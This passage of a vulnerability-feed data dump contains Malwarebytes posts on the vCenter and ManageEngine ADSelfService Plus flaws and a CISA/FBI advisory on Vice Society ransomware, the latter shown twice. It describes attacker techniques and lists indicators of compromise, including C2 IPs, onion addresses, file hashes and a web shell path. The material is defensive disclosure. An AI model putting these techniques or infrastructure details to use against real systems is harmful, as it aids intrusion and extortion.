appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-07-21T14:31:50", "type": "malwarebytes", "title": "HiveNightmare zero-day lets anyone be SYSTEM on Windows 10 and 11", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-21T14:31:50", "id": "MALWAREBYTES:17B7F98583E0297FC4ECAB159A115DB9", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/hivenightmare-zero-day-lets-anyone-be-system-on-windows-10-and-11/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T20:35:11", "description": "VMware is urging users of vCenter server to patch no fewer than [19 problems](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) affecting its products. \n\nThese updates fix a variety of security vulnerabilities, but one of them is particularly nasty. That would be [CVE-2021-22005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22005>), a critical file upload vulnerability with a CVSS score of 9.8 out of 10.\n\nIt's so bad the company is advising users to **sort it out "[right now](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)"**:\n\n> These updates fix a critical security vulnerability, and your response needs to be considered at once. Organizations that practice change management using the ITIL definitions of change types would consider this an \u201cemergency change.\u201d\n\n### CVE-2021-22005\n\nvServer Center is a way to [manage large infrastructure](<https://geek-university.com/vmware-esxi/what-is-vcenter-server/>). If you have lots of hosts and virtual machines, this is a very good way to manage every aspect of your setup. With this in mind, if someone manages to compromise your vCenter, it probably won't end well.\n\nAnd that's exactly what CVE-2021-22005 does. 
It's a file upload vulnerability and anyone with access to vServer Center over a network can exploit it. The configuration settings of vServer Center don't make any difference. If criminals get network access they can upload a specially made file and use it to execute code on the vServer Center.\n\nAs VMware points out, bad actors are often already in your network. They wait patiently to strike. It's likely they'll exfiltrate data slowly and nobody will ever know they're there. Being able to snag a win like this for themselves could increase the threat from ransomware and other malicious activity.\n\n### What should I do?\n\nWell, patch immediately is definitely the [go-to advice](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>). If an emergency patch falls outside how you usually do things, VMware mentions, but it really does impress upon readers that patching needs to be done as soon as possible. It is, perhaps, unusual (and refreshing) to see an organisation stress this fact so plainly, so kudos for being so forthright.\n\n### Is my vServer setup affected by this?\n\nIt depends. Some versions, such as vCenter Server 6.5, are not affected. Others are. You should refer to the [dedicated rundown on](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) this issue and take appropriate action as soon as you possibly can. We'll leave the last word to VMware with regard to when you should be patching:\n\n> Immediately, the ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\n> \n> With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. 
This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.\n\nThis seems like very good advice.\n\nThe post [Patch vCenter Server "right now", VMWare expects CVE-2021-22005 exploitation within minutes of disclosure](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T11:27:11", "type": "malwarebytes", "title": "Patch vCenter Server \u201cright now\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T11:27:11", "id": "MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-17T14:35:09", "description": "In a [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) the FBI, the United States Coast Guard Cyber Command (CGCYBER), and the Cybersecurity and Infrastructure Security Agency (CISA) warn that advanced persistent threat (APT) cyber-actors may be exploiting a vulnerability in ManageEngine's single sign-on (SSO) solution.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). 
The vulnerability in question is listed under [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) as a REST API authentication bypass with resultant remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus version 6113 and prior.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This would allow attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it's a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network.\n\n### In-the-wild exploitation\n\nWhen [word of the vulnerability came out](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other [researchers](<https://twitter.com/voodoodahl1/status/1435673340539281410>) chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat-actor. Yesterday's joint advisory seems to support that, telling us that APT cyber-actors are likely among those exploiting the vulnerability. \n\nThey find this of high concern since this poses a serious risk to critical infrastructure companies. 
CISA recognizes [16 critical infrastructure sectors](<https://www.cisa.gov/critical-infrastructure-sectors>) whose "assets, systems, and networks, whether physical or virtual, are considered so vital to the United States that their incapacitation or destruction would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof."\n\nThe joint advisory points out that the suspected APT cyber-actors have targeted academic institutions, defense contractors, and critical infrastructure entities in multiple industry sectors\u2014including transportation, IT, manufacturing, communications, logistics, and finance.\n\nIt also warns that successful exploitation of the vulnerability allows an attacker to place web shells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\n\nAccording to the advisory, the JavaServer Pages web shell arrives as a `.zip` file "masquerading as an x509 certificate" called `service.cer`. The web shell is then accessed via the URL path `/help/admin-guide/Reports/ReportGenerate.jsp`. \n\nHowever, it warns:\n\n> Confirming a successful compromise of ManageEngine ADSelfService Plus may be difficult\u2014the attackers run clean-up scripts designed to remove traces of the initial point of compromise and hide any relationship between exploitation of the vulnerability and the web shell.\n\nPlease consult the advisory for a [full list of IOCs](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>).\n\n### Mitigation\n\nA patch for this vulnerability was made available on September 7, 2021. Users are advised to update to ADSelfService Plus build 6114. 
The FBI, CISA, and CGCYBER also strongly urge organizations to make sure that ADSelfService Plus is not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations. It also has information about how you can reach out to support if you need further information, have any questions, or face any difficulties updating ADSelfService Plus.\n\nStay safe, everyone!\n\nThe post [FBI and CISA warn of APT groups exploiting ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-17T13:48:46", "type": "malwarebytes", "title": "FBI and CISA warn of APT groups exploiting ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-17T13:48:46", "id": "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-12-03T17:06:33", "description": "### Summary\n\nActions to take today to mitigate cyber threats from ransomware:\n\n\u2022 Prioritize and remediate [known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>). \n\u2022 Train users to recognize and report phishing attempts. 
\n\u2022 Enable and enforce multifactor authentication.\n\n_**Note:** This joint Cybersecurity Advisory (CSA) is part of an ongoing [#StopRansomware](<https://www.cisa.gov/stopransomware/stopransomware>) effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources._\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate IOCs and TTPs associated with Vice Society actors identified through FBI investigations as recently as September 2022. The FBI, CISA, and the MS-ISAC have recently observed Vice Society actors disproportionately targeting the education sector with ransomware attacks.\n\nOver the past several years, the education sector, especially kindergarten through twelfth grade (K-12) institutions, has been a frequent target of ransomware attacks. Impacts from these attacks have included restricted access to networks and data, delayed exams, canceled school days, and unauthorized access to and theft of personal information regarding students and staff. The FBI, CISA, and the MS-ISAC anticipate attacks may increase as the 2022/2023 school year begins and criminal ransomware groups perceive opportunities for successful attacks. School districts with limited cybersecurity capabilities and constrained resources are often the most vulnerable; however, the opportunistic targeting often seen with cyber criminals can still put school districts with robust cybersecurity programs at risk. 
K-12 institutions may be seen as particularly lucrative targets due to the amount of [sensitive student data](<https://www.ic3.gov/Media/News/2022/220526.pdf>) accessible through school systems or their managed service providers. \n\nThe FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.\n\nDownload the PDF version of this report: pdf, 521 KB\n\nDownload the IOCs: .stix 31 kb\n\n### Technical Details\n\n**Note:** This advisory uses the MITRE ATT&CK\u00ae for Enterprise framework, version 11. See [MITRE ATT&CK for Enterprise](<https://attack.mitre.org/versions/v11/matrices/enterprise/>) for all referenced tactics and techniques.\n\nVice Society is an intrusion, exfiltration, and extortion hacking group that first appeared in summer 2021. Vice Society actors do not use a ransomware variant of unique origin. Instead, the actors have deployed versions of [Hello Kitty/Five Hands](<https://www.cisa.gov/sites/default/files/publications/FLASH_CU_000154_MW_508c.pdf>) and [Zeppelin ransomware](<https://www.cisa.gov/uscert/ncas/alerts/aa22-223a>), but may deploy other variants in the future.\n\nVice Society actors likely obtain initial network access through compromised credentials by exploiting internet-facing applications [[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)]. Prior to deploying ransomware, the actors spend time exploring the network, identifying opportunities to increase accesses, and exfiltrating data [[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)] for double extortion--a tactic whereby actors threaten to publicly release sensitive data unless a victim pays a ransom. Vice Society actors have been observed using a variety of tools, including SystemBC, PowerShell Empire, and Cobalt Strike to move laterally. 
They have also used \u201cliving off the land\u201d techniques targeting the legitimate Windows Management Instrumentation (WMI) service [[T1047](<https://attack.mitre.org/versions/v11/techniques/T1047/>)] and tainting shared content [[T1080](<https://attack.mitre.org/versions/v11/techniques/T1080/>)]. \n\nVice Society actors have been observed exploiting the PrintNightmare vulnerability ([CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>) and [CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>) ) to escalate privileges [[T1068](<https://attack.mitre.org/versions/v11/techniques/T1068/>)]. To maintain persistence, the criminal actors have been observed leveraging scheduled tasks [[T1053](<https://attack.mitre.org/versions/v11/techniques/T1053/>)], creating undocumented autostart Registry keys [[T1547.001](<https://attack.mitre.org/techniques/T1547/001/>)], and pointing legitimate services to their custom malicious dynamic link libraries (DLLs) through a tactic known as DLL side-loading [[T1574.002](<https://attack.mitre.org/versions/v11/techniques/T1547/002/>)]. Vice Society actors attempt to evade detection through masquerading their malware and tools as legitimate files [[T1036](<https://attack.mitre.org/versions/v11/techniques/T1036/>)], using process injection [[T1055](<https://attack.mitre.org/versions/v11/techniques/T1055/>)], and likely use evasion techniques to defeat automated dynamic analysis [[T1497](<https://attack.mitre.org/versions/v11/techniques/T1497/>)]. Vice Society actors have been observed escalating privileges, then gaining access to domain administrator accounts, and running scripts to change the passwords of victims\u2019 network accounts to prevent the victim from remediating. 
\n\n### Indicators of Compromise (IOCs)\n\n**Email Addresses** \n--- \nv-society.official@onionmail[.]org \nViceSociety@onionmail[.]org \nOnionMail email accounts in the format of [First Name][Last Name]@onionmail[.]org \n \n**TOR Address** \n--- \nhttp://vsociethok6sbprvevl4dlwbqrzyhxcxaqpvcqt5belwvsuxaxsutyad[.]onion \n \n**IP Addresses for C2** | **Confidence Level** \n---|--- \n5.255.99[.]59 | High Confidence \n5.161.136[.]176 | Medium Confidence \n198.252.98[.]184 | Medium Confidence \n194.34.246[.]90 | Low Confidence \n \nSee Table 1 for file hashes obtained from FBI incident response investigations in September 2022.\n\n_Table 1: File Hashes as of September 2022_\n\n**MD5** | **SHA1** \n---|--- \nfb91e471cfa246beb9618e1689f1ae1d | a0ee0761602470e24bcea5f403e8d1e8bfa29832 \n| 3122ea585623531df2e860e7d0df0f25cce39b21 \n| 41dc0ba220f30c70aea019de214eccd650bc6f37 \n| c9c2b6a5b930392b98f132f5395d54947391cb79 \n \n### MITRE ATT&CK TECHNIQUES\n\nVice Society actors have used ATT&CK techniques, similar to Zeppelin techniques, listed in Table 2.\n\n_Table 2: Vice Society Actors ATT&CK Techniques for Enterprise_\n\n_Initial Access_ \n \nTechnique Title | ID | Use \n---|---|--- \nExploit Public-Facing Application | [T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>) | Vice Society actors exploit vulnerabilities in internet-facing systems to gain access to victims\u2019 networks. \nValid Accounts | [T1078](<https://attack.mitre.org/versions/v11/techniques/T1078/>) | Vice Society actors obtain initial network access through compromised valid accounts. 
\n \n_Execution_ \n \nTechnique Title | ID | Use \n---|---|--- \nWindows Management Instrumentation (WMI) | [T1047](<https://attack.mitre.org/versions/v11/techniques/T1047/>) | Vice Society actors leverage WMI as a means of \u201cliving off the land\u201d to execute malicious commands. WMI is a native Windows administration feature. \nScheduled Task/Job | [T1053](<https://attack.mitre.org/versions/v11/techniques/T1053/>) | Vice Society actors have used malicious files that create component task schedule objects, which are often meant to register a specific task to autostart on system boot. This facilitates recurring execution of their code. \n \n_Persistence_ \n \nTechnique Title | ID | Use \n---|---|--- \nModify System Process | [T1543.003](<https://attack.mitre.org/versions/v11/techniques/T1543/003/>) | Vice Society actors encrypt Windows Operating functions to preserve compromised system functions. \nRegistry Run Keys/Startup Folder | [T1547.001](<https://attack.mitre.org/versions/v11/techniques/T1547/001/>) | Vice Society actors have employed malicious files that create an undocumented autostart Registry key to maintain persistence after boot/reboot. \nDLL Side-Loading | [T1574.002](<https://attack.mitre.org/versions/v11/techniques/T1547/002/>) | Vice Society actors may directly side-load their payloads by planting their own DLL then invoking a legitimate application that executes the payload within that DLL. This serves as both a persistence mechanism and a means to masquerade actions under legitimate programs. 
\n \n_Privilege Escalation_ \n \nTechnique Title | ID | Use \n---|---|--- \nExploitation for Privilege Escalation | [T1068](<https://attack.mitre.org/versions/v11/techniques/T1068/>) | Vice Society actors have been observed exploiting the PrintNightmare vulnerability ([CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>) and [CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>)) to escalate privileges. \n \n_Defense Evasion_ \n \nTechnique Title | ID | Use \n---|---|--- \nMasquerading | [T1036](<https://attack.mitre.org/versions/v11/techniques/T1036/>) | Vice Society actors may attempt to manipulate features of the files they drop in a victim\u2019s environment to mask the files or make the files appear legitimate. \nProcess Injection | [T1055](<https://attack.mitre.org/versions/v11/techniques/T1055/>) | Vice Society artifacts have been analyzed to reveal the ability to inject code into legitimate processes for evading process-based defenses. This tactic has other potential impacts, including the ability to escalate privileges or gain additional accesses. \nSandbox Evasion | [T1497](<https://attack.mitre.org/versions/v11/techniques/T1497/>) | Vice Society actors may have included sleep techniques in their files to hinder common reverse engineering or dynamic analysis. \n \n_Lateral Movement_ \n \nTechnique Title | ID | Use \n---|---|--- \nTaint Shared Content | [T1080](<https://attack.mitre.org/versions/v11/techniques/T1080/>) | Vice Society actors may deliver payloads to remote systems by adding content to shared storage locations such as network drives. 
\n \n_Exfiltration_ \n \nTechnique Title | ID | Use \n---|---|--- \nExfiltration | [TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>) | Vice Society actors are known for double extortion, which is a second attempt to force a victim to pay by threatening to expose sensitive information if the victim does not pay a ransom. \n \n_Impact_ \n \nTechnique Title | ID | Use \n---|---|--- \nData Encrypted for Impact | [T1486](<https://attack.mitre.org/versions/v11/techniques/T1486/>) | Vice Society actors have encrypted data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. \nAccount Access Removal | [T1531](<https://attack.mitre.org/versions/v11/techniques/T1531/>) | Vice Society actors run a script to change passwords of victims\u2019 email accounts. \n \n### Mitigations\n\nThe FBI and CISA recommend organizations, particularly the education sector, establish and maintain strong liaison relationships with the FBI Field Office in their region and their regional CISA Cybersecurity Advisor. The location and contact information for FBI Field Offices and CISA Regional Offices can be located at [www.fbi.gov/contact-us/field-offices](<http://www.fbi.gov/contact-us/field-offices>) and [www.cisa.gov/cisa-regions](<https://www.cisa.gov/cisa-regions>), respectively. Through these partnerships, the FBI and CISA can assist with identifying vulnerabilities to academia and mitigating potential threat activity. 
The FBI and CISA further recommend that academic entities review and, if needed, update incident response and communication plans that list actions an organization will take if impacted by a cyber incident.\n\nThe FBI, CISA, and the MS-ISAC recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques and to reduce the risk of compromise by Vice Society actors:\n\n**Preparing for Cyber Incidents**\n\n * Maintain offline backups of data, and regularly maintain backup and restoration procedures. By instituting this practice, the organization ensures it will not be severely interrupted or left with only irretrievable data. \n * Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization\u2019s data infrastructure. Ensure your backup data is not already infected.\n * Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.\n * Implement allowlisting policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.\n * Document and monitor external remote connections. 
Organizations should document approved solutions for remote management and maintenance, and immediately investigate if an unapproved solution is installed on a workstation.\n * Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).\n\n**Identity and Access Management**\n\n * Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with [National Institute of Standards and Technology (NIST) standards](<https://pages.nist.gov/800-63-3/>) for developing and managing password policies: \n   * Use longer passwords consisting of at least 8 characters and no more than 64 characters in length;\n   * Store passwords in hashed format using industry-recognized password managers;\n   * Add password user \u201csalts\u201d to shared login credentials;\n   * Avoid reusing passwords;\n   * Implement multiple failed login attempt account lockouts;\n   * Disable password \u201chints\u201d;\n   * Refrain from requiring password changes more frequently than once per year unless a password is known or suspected to be compromised. \n\n   **Note:** NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password \u201cpatterns\u201d cyber criminals can easily decipher. \n\n * Require administrator credentials to install software.\n * Require phishing-resistant multifactor authentication for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems. \n * Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.\n * Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege. 
\n * Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task. \n\n**Protective Controls and Architecture**\n\n * Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between\u2014and access to\u2014various subnetworks and by restricting adversary lateral movement. \n * Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host. \n * Install, regularly update, and enable real time detection for antivirus software on all hosts. \n * Secure and closely monitor remote desktop protocol (RDP) use. \n * Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. If RDP is deemed operationally necessary, restrict the originating sources and require MFA to mitigate credential theft and reuse. 
If RDP must be available externally, use a VPN, virtual desktop infrastructure, or other means to authenticate and secure the connection before allowing RDP to connect to internal devices. Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts to block brute force campaigns, log RDP login attempts, and disable unused remote access/RDP ports.\n\n**Vulnerability and Configuration Management**\n\n * Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Organizations should prioritize patching of vulnerabilities on CISA\u2019s [Known Exploited Vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) catalog.\n * Disable unused ports.\n * Consider adding an email banner to emails received from outside your organization.\n * Disable hyperlinks in received emails.\n * Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally. \n * Ensure devices are properly configured and that security features are enabled. \n * Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389).\n * Restrict Server Message Block (SMB) Protocol within the network to only access servers that are necessary, and remove or disable outdated versions of SMB (i.e., SMB version 1). 
Threat actors use SMB to propagate malware across organizations.\n\n### REFERENCES\n\n * [Stopransomware.gov](<https://www.cisa.gov/stopransomware>) is a whole-of-government approach that gives one central location for ransomware resources and alerts.\n * Resource to mitigate a ransomware attack: [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware%20Guide_S508C.pdf>).\n * No-cost cyber hygiene services: [Cyber Hygiene Services](<https://www.cisa.gov/cyber-hygiene-services>) and [Ransomware Readiness Assessment](<https://github.com/cisagov/cset/>).\n\n### REPORTING\n\nThe FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Vice Society actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. \n\nThe FBI, CISA, and the MS-ISAC strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to a [local FBI Field Office](<https://www.fbi.gov/contact-us/field-offices>), or to CISA at [report@cisa.gov](<mailto:report@cisa.gov>) or (888) 282-0870. SLTT government entities can also report to the MS-ISAC ([SOC@cisecurity.org](<mailto:SOC@cisecurity.org>) or 866-787-4722).\n\n### DISCLAIMER\n\nThe information in this report is being provided \u201cas is\u201d for informational purposes only. The FBI, CISA, and the MS-ISAC do not endorse any commercial product or service, including any subjects of analysis. 
Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.\n\n### Revisions\n\nSeptember 6, 2022: Initial Version\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-08T12:00:00", "type": "ics", "title": "#StopRansomware: Vice Society", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-09-08T12:00:00", "id": "AA22-249A-0", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-249a-0", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:06:18", "description": "_**Note:** This joint Cybersecurity Advisory (CSA) is part of an ongoing [#StopRansomware](<https://www.cisa.gov/stopransomware/stopransomware>) effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. 
These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources._\n\n**Actions to take today to mitigate cyber threats from ransomware:**\n\n\u2022 Prioritize and remediate known exploited vulnerabilities. \n\u2022 Train users to recognize and report phishing attempts. \n\u2022 Enable and enforce multifactor authentication.\n\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate IOCs and TTPs associated with Vice Society actors identified through FBI investigations as recently as September 2022. The FBI, CISA, and the MS-ISAC have recently observed Vice Society actors disproportionately targeting the education sector with ransomware attacks.\n\nOver the past several years, the education sector, especially kindergarten through twelfth grade (K-12) institutions, has been a frequent target of ransomware attacks. Impacts from these attacks have included restricted access to networks and data, delayed exams, canceled school days, and unauthorized access to and theft of personal information regarding students and staff. The FBI, CISA, and the MS-ISAC anticipate attacks may increase as the 2022/2023 school year begins and criminal ransomware groups perceive opportunities for successful attacks. School districts with limited cybersecurity capabilities and constrained resources are often the most vulnerable; however, the opportunistic targeting often seen with cyber criminals can still put school districts with robust cybersecurity programs at risk. 
K-12 institutions may be seen as particularly lucrative targets due to the amount of [sensitive student data](<https://www.ic3.gov/Media/News/2022/220526.pdf>) accessible through school systems or their managed service providers.\n\nThe FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.\n\nDownload the PDF version of this report: pdf, 521 KB\n\nDownload the IOCs: [.stix 31 kb](<https://www.cisa.gov/uscert/sites/default/files/publications/AA22-249A.stix.xml>)\n\n### Technical Details\n\n**Note:** _This advisory uses the MITRE ATT&CK_\u00ae_ for Enterprise framework, version 11. See _[_MITRE ATT&CK for Enterprise_](<https://attack.mitre.org/versions/v11/matrices/enterprise/>)_ for all referenced tactics and techniques_.\n\nVice Society is an intrusion, exfiltration, and extortion hacking group that first appeared in summer 2021. Vice Society actors do not use a ransomware variant of unique origin. Instead, the actors have deployed versions of Hello Kitty/Five Hands and Zeppelin ransomware, but may deploy other variants in the future.\n\nVice Society actors likely obtain initial network access through compromised credentials by exploiting internet-facing applications [[T1190](<https://attack.mitre.org/versions/v11/techniques/T1190/>)]. Prior to deploying ransomware, the actors spend time exploring the network, identifying opportunities to increase accesses, and exfiltrating data [[TA0010](<https://attack.mitre.org/versions/v11/tactics/TA0010/>)] for double extortion--a tactic whereby actors threaten to publicly release sensitive data unless a victim pays a ransom. Vice Society actors have been observed using a variety of tools, including SystemBC, PowerShell Empire, and Cobalt Strike to move laterally. 
They have also used \u201cliving off the land\u201d techniques targeting the legitimate Windows Management Instrumentation (WMI) service [[T1047](<https://attack.mitre.org/versions/v11/techniques/T1047/>)] and tainting shared content [[T1080](<https://attack.mitre.org/versions/v11/techniques/T1080/>)].\n\nVice Society actors have been observed exploiting the PrintNightmare vulnerability ([CVE-2021-1675](<https://nvd.nist.gov/vuln/detail/CVE-2021-1675>) and [CVE-2021-34527](<https://nvd.nist.gov/vuln/detail/CVE-2021-34527>) ) to escalate privileges [[T1068](<https://attack.mitre.org/versions/v11/techniques/T1068/>)]. To maintain persistence, the criminal actors have been observed leveraging scheduled tasks [[T1053](<https://attack.mitre.org/versions/v11/techniques/T1053/>)], creating undocumented autostart Registry keys [[T1547.001](<https://attack.mitre.org/techniques/T1547/001/>)], and pointing legitimate services to their custom malicious dynamic link libraries (DLLs) through a tactic known as DLL side-loading [[T1574.002](<https://attack.mitre.org/versions/v11/techniques/T1547/002/>)]. Vice Society actors attempt to evade detection through masquerading their malware and tools as legitimate files [[T1036](<https://attack.mitre.org/versions/v11/techniques/T1036/>)], using process injection [[T1055](<https://attack.mitre.org/versions/v11/techniques/T1055/>)], and likely use evasion techniques to defeat automated dynamic analysis [[T1497](<https://attack.mitre.org/versions/v11/techniques/T1497/>)]. Vice Society actors have been observed escalating privileges, then gaining access to domain administrator accounts, and running scripts to change the passwords of victims\u2019 network accounts to prevent the victim from remediating. 
